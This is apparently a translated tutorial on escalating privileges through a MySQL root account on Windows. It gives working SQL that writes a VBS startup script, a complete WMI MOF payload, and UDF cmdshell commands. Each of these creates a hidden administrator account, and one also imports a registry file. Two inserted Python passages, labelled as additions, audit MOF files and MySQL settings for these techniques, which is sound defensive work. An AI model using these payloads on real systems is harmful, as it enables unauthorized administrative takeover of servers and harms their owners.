In general this requires the MySQL root account, that is, knowing the root account's password.
Startup-item privilege escalation:
Principle: use the high-privilege root account to write a VBS script into the startup folder, then get the server to restart by some means (DDoS, social engineering, etc.) so that the script runs at boot and the escalation takes effect.
1. Look at which tables exist in the database:
mysql> show tables;
By default there are no tables in test.
The following are the key steps.
2. Create a new table under the test database:
mysql> create table a (cmd text);
We have now created a table named a with a single field, cmd, of type text.
3. Insert content into the table:
mysql> insert into a values ("Set WshShell=CreateObject(""WScript.Shell"")");
mysql> insert into a values ("a=WshShell.Run(""cmd.exe /c net user 1 1 /add"",0)");
mysql> insert into a values ("b=WshShell.Run(""cmd.exe /c net localgroup administrators 1 /add"",0)");
Note the double quotes and parentheses, and the trailing 0 must be included. These three rows will form the VBS script.
4. Now look at what is in table a:
mysql> select * from a;
You will see three rows of data, the ones just inserted. Having confirmed the content is correct, move on to the next step.
5. Write the table out as a VBS script file:
mysql> select * from a into outfile "c://docume~1//administrator//Start Menu//Programs//Startup//digo8.vbs";
6. Reboot!
MOF privilege escalation:
MySQL MOF vulnerability description:
http://www.exploit-db.com/exploits/23083/
Http://www.exploit-db.com/sploits/23083.zip
The MOF file contents are:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "filtP2";
    Query = "SELECT * FROM __InstanceModificationEvent "
            "WHERE TargetInstance ISA \"Win32_LocalTime\" "
            "AND TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
The effect is to add the user admin with password admin.
The same MOF file can also be written out from MySQL with a SELECT CHAR(...) INTO DUMPFILE 'C:/windows/system32/wbem/mof/nullevt.mof' statement, the CHAR() argument being the byte values of the file above. The effect is to add the user admin with password admin and put it in the Administrators group.
By default this adds the user once every 5 s; the cleanup is:
First, net stop winmgmt to stop the service;
second, delete the folder C:\WINDOWS\system32\wbem\Repository\;
third, net start winmgmt to start the service again.
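As an added defensive example (not part of the original page), a small Python triage routine that parses a MOF file of this shape and flags the __FilterToConsumerBinding tying a timer-style __EventFilter to an ActiveScriptEventConsumer or CommandLineEventConsumer whose payload invokes a shell; the embedded sample is the page's own subscription, condensed onto fewer lines. The names parse_instances, triage, SCRIPT_CONSUMERS and SHELL_TOKENS are mine.

```python
import re
# Constructed sample: the permanent WMI subscription from the MOF above, condensed onto fewer lines.
SAMPLE_MOF = r'''#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{   Name = "filtP2";  EventNamespace = "root\\cimv2";  QueryLanguage = "WQL";
    Query = "SELECT * FROM __InstanceModificationEvent "
            "WHERE TargetInstance ISA \"Win32_LocalTime\" AND TargetInstance.Second = 5"; };
instance of ActiveScriptEventConsumer as $Consumer
{   Name = "consPCSV2";  ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; };
instance of __FilterToConsumerBinding
{   Consumer = $Consumer;  Filter = $EventFilter; };
'''

INSTANCE_RE = re.compile(r'instance\s+of\s+(\w+)(?:\s+as\s+(\$\w+))?\s*\{(.*?)\};', re.S | re.I)
PROP_RE = re.compile(r'(\w+)\s*=\s*(.*?);', re.S)
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
SCRIPT_CONSUMERS = {"activescripteventconsumer", "commandlineeventconsumer"}
SHELL_TOKENS = ("wscript.shell", "cmd.exe", "net.exe", "net user", "net localgroup", "powershell")

def parse_instances(mof):
    """Return (class, alias, {property: value}) for every 'instance of X [as $a] { ... };' block."""
    out = []
    for cls, alias, body in INSTANCE_RE.findall(mof):
        props = {}
        for name, raw in PROP_RE.findall(body):
            lits = STR_RE.findall(raw)          # adjacent MOF string literals concatenate
            props[name.lower()] = "".join(lits) if lits else raw.strip()
        out.append((cls.lower(), alias, props))
    return out

def triage(mof):
    """Return findings for the filter -> script consumer chain this kind of MOF installs."""
    insts = parse_instances(mof)
    by_alias = {a: (c, p) for c, a, p in insts if a}
    findings = []
    for cls, _alias, props in insts:
        if cls in SCRIPT_CONSUMERS:
            payload = (props.get("scripttext") or props.get("commandlinetemplate") or "").lower()
            hits = [t for t in SHELL_TOKENS if t in payload]
            if hits:
                findings.append(f"{cls} '{props.get('name')}' runs shell: {', '.join(hits)}")
        elif cls == "__filtertoconsumerbinding":
            ccls, cprops = by_alias.get(props.get("consumer"), ("", {}))
            fcls, fprops = by_alias.get(props.get("filter"), ("", {}))
            if ccls in SCRIPT_CONSUMERS:
                findings.append(f"binding to {ccls} '{cprops.get('name')}'")
            if "win32_localtime" in fprops.get("query", "").lower():
                findings.append(f"timer-style trigger in filter '{fprops.get('name')}'")
    return findings
```

This is meant for files recovered from wbem\mof or an exported repository; on a live host the same three object classes are queried from the root\subscription namespace, and the cleanup above (stop winmgmt, remove the Repository folder) is what removes a subscription that has already been compiled in.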
UDF privilege escalation: the Dark Moon script is recommended.
Of course, you can also connect to the database directly from a DOS prompt and execute the following statements, which achieves the same thing:
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user iis_user [email protected]#abcABC /add');
select cmdshell('net localgroup administrators iis_user /add');
select cmdshell('regedit /s d:web3389.reg');
drop function cmdshell;
select cmdshell('netstat -an');
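Added example, not from the page: a Python audit of the MySQL-side preconditions the three techniques above share, namely secure_file_priv (which governs INTO OUTFILE/DUMPFILE), accounts holding the FILE privilege, and UDFs registered in mysql.func (where CREATE FUNCTION ... SONAME lands). The input rows are constructed to look like DB-API cursor results; the names EXEC_UDFS, check_secure_file_priv and audit are mine.

```python
# Known command-execution UDF names: the page's cmdshell plus the lib_mysqludf_sys family.
EXEC_UDFS = {"cmdshell", "sys_exec", "sys_eval", "sys_get", "sys_set"}
LOCAL_HOSTS = ("localhost", "127.0.0.1", "::1")

def check_secure_file_priv(value):
    """Interpret the value of SHOW VARIABLES LIKE 'secure_file_priv'; returns (severity, message)."""
    if value is None or value.upper() == "NULL":
        return ("ok", "secure_file_priv=NULL: INTO OUTFILE/DUMPFILE and LOAD DATA are disabled")
    if value == "":
        return ("high", "secure_file_priv is empty: FILE holders can write anywhere mysqld can "
                        "(startup folders, wbem\\mof, the plugin dir)")
    return ("info", f"secure_file_priv={value}: file writes confined to that directory")

def audit(secure_file_priv, users, funcs):
    """users: rows of (user, host, File_priv) from mysql.user; funcs: rows of (name, dl) from mysql.func."""
    findings = [check_secure_file_priv(secure_file_priv)]
    for user, host, file_priv in users:
        if file_priv == "Y":
            # FILE is what SELECT ... INTO OUTFILE/DUMPFILE requires; remote hosts widen the exposure.
            sev = "high" if host not in LOCAL_HOSTS else "medium"
            findings.append((sev, f"{user}@{host} holds FILE: can write files with SELECT ... INTO OUTFILE"))
    for name, dl in funcs:
        if name.lower() in EXEC_UDFS:
            findings.append(("critical", f"UDF {name} from {dl} in mysql.func: OS command execution"))
        else:
            findings.append(("medium", f"unexpected UDF {name} from {dl}: verify the library is legitimate"))
    return findings

# Constructed sample results, shaped like what a cursor returns for the three queries named above.
SAMPLE = dict(secure_file_priv="",
              users=[("root", "localhost", "Y"), ("web", "%", "Y"), ("app", "localhost", "N")],
              funcs=[("cmdshell", "udf.dll")])
```

It cannot see which Windows account mysqld runs under or whether the plugin directory is writable; those are checked on the host.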
How to use MySQL for privilege escalation